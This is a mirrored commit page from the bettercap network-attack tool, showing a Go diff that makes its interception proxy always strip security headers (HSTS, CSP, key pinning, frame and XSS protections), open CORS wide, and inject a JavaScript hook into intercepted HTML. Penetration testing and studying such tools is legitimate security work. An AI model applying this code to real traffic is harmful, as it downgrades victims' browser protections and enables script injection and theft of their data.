mirror of
https://github.com/bettercap/bettercap
synced 2025-08-14 02:36:57 -07:00
fix: fixing request and response headers and downgrading security even if sslstrip is disabled
This commit is contained in:
evilsocket
parent
e650958e8b
commit
3d852a0fae
2 changed files with 34 additions and 38 deletions
|
|
@ -11,9 +11,19 @@ import (
|
|||
"github.com/elazarl/goproxy"
|
||||
)
|
||||
|
||||
func (p *HTTPProxy) fixRequestHeaders(req *http.Request) {
|
||||
req.Header.Del("Accept-Encoding")
|
||||
req.Header.Del("If-None-Match")
|
||||
req.Header.Del("If-Modified-Since")
|
||||
req.Header.Del("Upgrade-Insecure-Requests")
|
||||
req.Header.Set("Pragma", "no-cache")
|
||||
}
|
||||
|
||||
func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
|
||||
log.Debug("(%s) < %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path)
|
||||
|
||||
p.fixRequestHeaders(req)
|
||||
|
||||
redir := p.stripper.Preprocess(req, ctx)
|
||||
if redir != nil {
|
||||
// we need to redirect the user in order to make
|
||||
|
|
@ -41,6 +51,25 @@ func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*
|
|||
return req, nil
|
||||
}
|
||||
|
||||
func (p *HTTPProxy) fixResponseHeaders(res *http.Response) {
|
||||
res.Header.Del("Content-Security-Policy-Report-Only")
|
||||
res.Header.Del("Content-Security-Policy")
|
||||
res.Header.Del("Strict-Transport-Security")
|
||||
res.Header.Del("Public-Key-Pins")
|
||||
res.Header.Del("Public-Key-Pins-Report-Only")
|
||||
res.Header.Del("X-Frame-Options")
|
||||
res.Header.Del("X-Content-Type-Options")
|
||||
res.Header.Del("X-WebKit-CSP")
|
||||
res.Header.Del("X-Content-Security-Policy")
|
||||
res.Header.Del("X-Download-Options")
|
||||
res.Header.Del("X-Permitted-Cross-Domain-Policies")
|
||||
res.Header.Del("X-Xss-Protection")
|
||||
res.Header.Set("Allow-Access-From-Same-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Methods", "*")
|
||||
res.Header.Set("Access-Control-Allow-Headers", "*")
|
||||
}
|
||||
|
||||
func (p *HTTPProxy) getHeader(res *http.Response, header string) string {
|
||||
header = strings.ToLower(header)
|
||||
for name, values := range res.Header {
|
||||
|
|
@ -69,11 +98,12 @@ func (p *HTTPProxy) doScriptInjection(res *http.Response, cType string) (error,
|
|||
if err != nil {
|
||||
return err, nil
|
||||
} else if html := string(raw); strings.Contains(html, "</head>") {
|
||||
log.Info("(%s) > injecting javascript (%d bytes) into %s for %s",
|
||||
log.Info("(%s) > injecting javascript (%d bytes) into %s (%d bytes) for %s",
|
||||
core.Green(p.Name),
|
||||
len(p.jsHook),
|
||||
core.Yellow(res.Request.Host+res.Request.URL.Path),
|
||||
core.Bold(res.Request.RemoteAddr))
|
||||
len(raw),
|
||||
core.Bold(strings.Split(res.Request.RemoteAddr, ":")[0]))
|
||||
|
||||
html = strings.Replace(html, "</head>", p.jsHook, -1)
|
||||
newResp := goproxy.NewResponse(res.Request, cType, res.StatusCode, html)
|
||||
|
|
@ -97,6 +127,8 @@ func (p *HTTPProxy) onResponseFilter(res *http.Response, ctx *goproxy.ProxyCtx)
|
|||
|
||||
log.Debug("(%s) > %s %s %s%s", core.Green(p.Name), res.Request.RemoteAddr, res.Request.Method, res.Request.Host, res.Request.URL.Path)
|
||||
|
||||
p.fixResponseHeaders(res)
|
||||
|
||||
p.stripper.Process(res, ctx)
|
||||
|
||||
// do we have a proxy script?
|
||||
|
|
|
|||
|
|
@ -192,35 +192,6 @@ func (s *SSLStripper) Enable(enabled bool) {
|
|||
}
|
||||
}
|
||||
|
||||
func (s *SSLStripper) stripRequestHeaders(req *http.Request) {
|
||||
req.Header.Del("Accept-Encoding")
|
||||
req.Header.Del("If-None-Match")
|
||||
req.Header.Del("If-Modified-Since")
|
||||
req.Header.Del("Upgrade-Insecure-Requests")
|
||||
|
||||
req.Header.Set("Pragma", "no-cache")
|
||||
}
|
||||
|
||||
func (s *SSLStripper) stripResponseHeaders(res *http.Response) {
|
||||
res.Header.Del("Content-Security-Policy-Report-Only")
|
||||
res.Header.Del("Content-Security-Policy")
|
||||
res.Header.Del("Strict-Transport-Security")
|
||||
res.Header.Del("Public-Key-Pins")
|
||||
res.Header.Del("Public-Key-Pins-Report-Only")
|
||||
res.Header.Del("X-Frame-Options")
|
||||
res.Header.Del("X-Content-Type-Options")
|
||||
res.Header.Del("X-WebKit-CSP")
|
||||
res.Header.Del("X-Content-Security-Policy")
|
||||
res.Header.Del("X-Download-Options")
|
||||
res.Header.Del("X-Permitted-Cross-Domain-Policies")
|
||||
res.Header.Del("X-Xss-Protection")
|
||||
|
||||
res.Header.Set("Allow-Access-From-Same-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Methods", "*")
|
||||
res.Header.Set("Access-Control-Allow-Headers", "*")
|
||||
}
|
||||
|
||||
func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
|
||||
for name, values := range res.Header {
|
||||
for _, value := range values {
|
||||
|
|
@ -258,7 +229,6 @@ func (s *SSLStripper) processURL(url string) string {
|
|||
|
||||
// sslstrip preprocessing, takes care of:
|
||||
//
|
||||
// - patching / removing security related headers
|
||||
// - handling stripped domains
|
||||
// - making unknown session cookies expire
|
||||
func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
|
||||
|
|
@ -266,9 +236,6 @@ func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redi
|
|||
return
|
||||
}
|
||||
|
||||
// preprocess request headers
|
||||
s.stripRequestHeaders(req)
|
||||
|
||||
// well ...
|
||||
if req.URL.Scheme == "https" {
|
||||
// TODO: check for max redirects?
|
||||
|
|
@ -349,9 +316,6 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
|
|||
}
|
||||
}
|
||||
|
||||
// process response headers
|
||||
s.stripResponseHeaders(res)
|
||||
|
||||
// if we have a text or html content type, fetch the body
|
||||
// and perform sslstripping
|
||||
if s.isContentStrippable(res) {
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue